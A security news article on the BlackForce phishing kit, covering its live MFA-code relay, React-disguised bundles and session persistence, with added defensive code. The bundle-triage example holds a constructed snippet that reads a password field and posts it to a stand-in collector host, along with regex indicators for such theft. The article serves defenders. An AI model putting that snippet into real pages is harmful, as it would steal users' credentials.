A new entrant in the Phishing-as-a-Service (PhaaS) market is selling criminals a toolset built to slip past common security controls. Dubbed BlackForce, the rapidly evolving phishing kit has been seen targeting major global brands including Disney, Netflix, and DHL, using a deceptively “legitimate-looking” codebase to steal credentials and defeat Multi-Factor Authentication (MFA).
A new report from Zscaler ThreatLabz details the rise of BlackForce, first observed in August 2025. Sold openly via Telegram for €200-€300, the kit has iterated through several versions in a few months, growing from a simple credential harvester into a resilient, stateful attack platform.
What makes BlackForce particularly dangerous is that the phishing session is operated live, so one-time codes are captured and used before they expire rather than merely logged for later. “BlackForce is capable of stealing credentials and performing Man-in-the-Browser (MitB) attacks to steal one-time tokens and bypass multi-factor authentication (MFA),” the report states.

The attack chain relies on a live operator. Once a victim enters their initial credentials on a spoofed page, the attacker receives an alert. They then use a command-and-control (C2) panel to push a fake MFA prompt into the victim’s browser on demand. When the unsuspecting user enters their SMS or app-based code, the attacker captures it instantly and replays it against the real service while it is still valid, taking over the session in real time. The weakness being exploited is that a one-time code is just a number: the legitimate service cannot tell whether it was typed on its own login page or relayed from a look-alike.
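As an added example (not code from the report or from the kit), the following contrasts the two checks involved: an OTP verifier compares digits only, so a code relayed from a spoofed page passes, whereas a WebAuthn relying party also checks the origin recorded in the signed clientDataJSON, so an assertion produced on a look-alike origin fails. The hostnames, the in-memory “server” and the challenge value are constructed for the demo; the signature step is omitted because the origin check is independent of it.

```javascript
// Added illustration: OTP relay succeeds, origin-bound WebAuthn does not.
// All origins and values below are constructed for the example.
const REAL_ORIGIN = "https://login.example-brand.com";  // assumed legitimate site
const PHISH_ORIGIN = "https://login.example-brand.co";  // assumed look-alike

// --- Legacy OTP: the server checks the digits, not where they were typed.
function makeOtpServer(currentCode) {
  return { verify: (submitted) => submitted === currentCode };
}

// Victim types the code into the spoofed page; the live operator forwards it
// to the real site inside its validity window. The server cannot distinguish.
function relayOtp(server, codeTypedOnPhish) {
  return server.verify(codeTypedOnPhish);
}

// --- WebAuthn: the authenticator signs clientDataJSON, which embeds the origin
// the browser was on. The relying party rejects any other origin before it
// even gets to signature verification.
function b64url(str) {
  return Buffer.from(str, "utf8").toString("base64url");
}

// Simulates the clientDataJSON a browser would build on a given origin.
// (A real browser would already refuse on the look-alike because the RP ID
// does not match; the server-side check below is the second line of defence.)
function makeClientData(origin, challenge) {
  return b64url(JSON.stringify({ type: "webauthn.get", challenge, origin }));
}

function verifyClientData(clientDataB64, expectedOrigin, expectedChallenge) {
  const cd = JSON.parse(Buffer.from(clientDataB64, "base64url").toString("utf8"));
  if (cd.type !== "webauthn.get") return { ok: false, reason: "wrong ceremony type" };
  if (cd.challenge !== expectedChallenge) return { ok: false, reason: "challenge mismatch" };
  if (cd.origin !== expectedOrigin) return { ok: false, reason: `origin ${cd.origin} != ${expectedOrigin}` };
  return { ok: true, reason: "" };
}

function demo() {
  const otpServer = makeOtpServer("482913");
  const challenge = "c0nstructed-challenge-for-demo";    // constructed, not random
  const fromPhish = makeClientData(PHISH_ORIGIN, challenge);
  const fromReal = makeClientData(REAL_ORIGIN, challenge);
  return {
    otpRelayed: relayOtp(otpServer, "482913"),                                 // true
    webauthnRelayed: verifyClientData(fromPhish, REAL_ORIGIN, challenge).ok,  // false
    webauthnGenuine: verifyClientData(fromReal, REAL_ORIGIN, challenge).ok,   // true
  };
}
```

The point for defenders: SMS and app-based codes give the operator something portable, while an origin-bound credential gives them nothing usable, which is why phishing-resistant MFA, not a stronger OTP, is the structural fix for this class of kit.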
To evade detection, BlackForce camouflages its malicious nature by mimicking modern web development standards. Analysts discovered that the kit utilizes production builds of React and React Router, frameworks commonly used by legitimate enterprises.
“The most effective deception tactic used by the BlackForce phishing kit is its ‘legitimate-looking’ codebase,” researchers noted. In fact, “more than 99% of the malicious JavaScript file’s content consists of production builds of React and React Router, giving it a legitimate appearance”.
This camouflage is bolstered by “cache-busting” filenames such as index-[hash].js. In ordinary web development the hash changes with every build so browsers fetch the new script instead of a cached copy; here the same practice means the script’s URL changes with every release, so detections keyed on a filename or URL pattern do not survive the next build.
Perhaps the most concerning finding is the speed of the kit’s development. In just a few months, the authors released versions 3, 4, and 5, introducing significant architectural shifts to improve resilience.
Earlier versions (V3) were “stateless”: captured data lived only in the page’s JavaScript memory, so a simple refresh by the victim cleared it and broke the multi-stage attack. Newer versions (V4 and V5) are “stateful.”
By writing to the browser’s sessionStorage, the kit can now “persist credentials across the entire session, creating a seamless and resilient multi-stage attack that survives page reloads”. Even if a network error or a reload interrupts the flow, the captured credentials are still there when the next stage runs.
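The two points above (a bundle that is almost entirely vendored React, and a small custom remainder that keeps captured state in sessionStorage) suggest a triage approach that does not depend on the ever-changing filename: subtract the exact text of known-good library builds from the bundle, then scan only what is left. The example below is added here and is not a tool from the report; the library stand-ins, the indicator regexes and the sample bundle are all constructed. In practice the reference text would be the exact production build of the version named in the bundle’s license banner, taken from the npm tarball.

```javascript
// Added example: "subtract known-good, scan the residue" bundle triage.
// Library stand-ins below are constructed; real references would be the exact
// react / react-dom / react-router production builds of the matching version.
const KNOWN_LIBRARY_TEXT = [
  "/**\n * @license React\n * react.production.min.js\n */\n!function(){var e={}" + "x".repeat(8000) + "}();",
  "/**\n * @remix-run/router v1.8.0\n */\n!function(){var r={}" + "y".repeat(3000) + "}();",
];

// Indicators applied to the custom remainder only. Chosen for this example;
// tune against your own corpus of legitimate bundles to control false positives.
const INDICATORS = [
  { name: "handles a password field", re: /["']password["']/ },
  { name: "persists captured data in sessionStorage", re: /sessionStorage\.setItem\(/ },
  { name: "sends data to an absolute URL", re: /fetch\(\s*["']https?:\/\//i },
  { name: "polls for an operator decision", re: /setInterval\(/ },
];

// Remove every exact occurrence of each known library; a tampered or patched
// copy will not match and therefore stays in the residue, which is what we want.
function subtractKnownLibraries(bundle, knownTexts = KNOWN_LIBRARY_TEXT) {
  let residue = bundle;
  let removed = 0;
  for (const lib of knownTexts) {
    let idx;
    while ((idx = residue.indexOf(lib)) !== -1) {
      residue = residue.slice(0, idx) + residue.slice(idx + lib.length);
      removed += lib.length;
    }
  }
  return { residue, libraryFraction: bundle.length ? removed / bundle.length : 0 };
}

function scanResidue(residue) {
  return INDICATORS.filter((i) => i.re.test(residue)).map((i) => i.name);
}

function triageBundle(bundle) {
  const { residue, libraryFraction } = subtractKnownLibraries(bundle);
  const hits = scanResidue(residue);
  return {
    libraryFraction,
    residueBytes: residue.length,
    hits,
    // Mostly vendored code plus a small tail that both touches credentials and
    // talks to the network is worth an analyst's time. Threshold is an assumption.
    suspicious: libraryFraction > 0.9 && hits.length >= 2,
  };
}

// Constructed phishing-style tail: the kind of small remainder the report
// describes, appended to the vendored libraries. Hostnames are made up.
const PAYLOAD_TAIL = `
document.querySelector('[name="password"]').addEventListener('change', e => {
  sessionStorage.setItem("st", JSON.stringify({ u: document.querySelector('[name="user"]').value, p: e.target.value }));
  fetch("https://collector.example/api/step", { method: "POST", body: sessionStorage.getItem("st") });
  setInterval(() => fetch("https://collector.example/api/next").then(r => r.json()).then(render), 2000);
});`;
const SAMPLE_BUNDLE = KNOWN_LIBRARY_TEXT.join("\n") + PAYLOAD_TAIL;

// A benign bundle built from the same libraries, for comparison.
const CLEAN_BUNDLE = KNOWN_LIBRARY_TEXT.join("\n") + "\nrender(createElement(App));";
```

Because the match is exact-text, this also catches the case where a library has been quietly modified: the altered copy stays in the residue and inflates it. The cost is keeping a corpus of reference builds per version, which the license banner at the top of each build makes easy to key on.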
BlackForce employs aggressive filtering to ensure only viable victims reach the landing page. It uses server-side blocklists to drop traffic from security vendors, web crawlers, and researchers. Later versions even enforce a “mobile-only” policy, rejecting desktop visitors outright to sidestep the analysis tooling that typically runs on workstations; anyone replaying a lure for analysis therefore needs to present a mobile client, not just a fresh IP address.
“The authors of BlackForce are actively modifying and improving the phishing kit, as evidenced by the rapid release of multiple versions in a short period,” ThreatLabz concludes, warning organizations to adopt zero-trust architectures to limit the blast radius of such compromised accounts.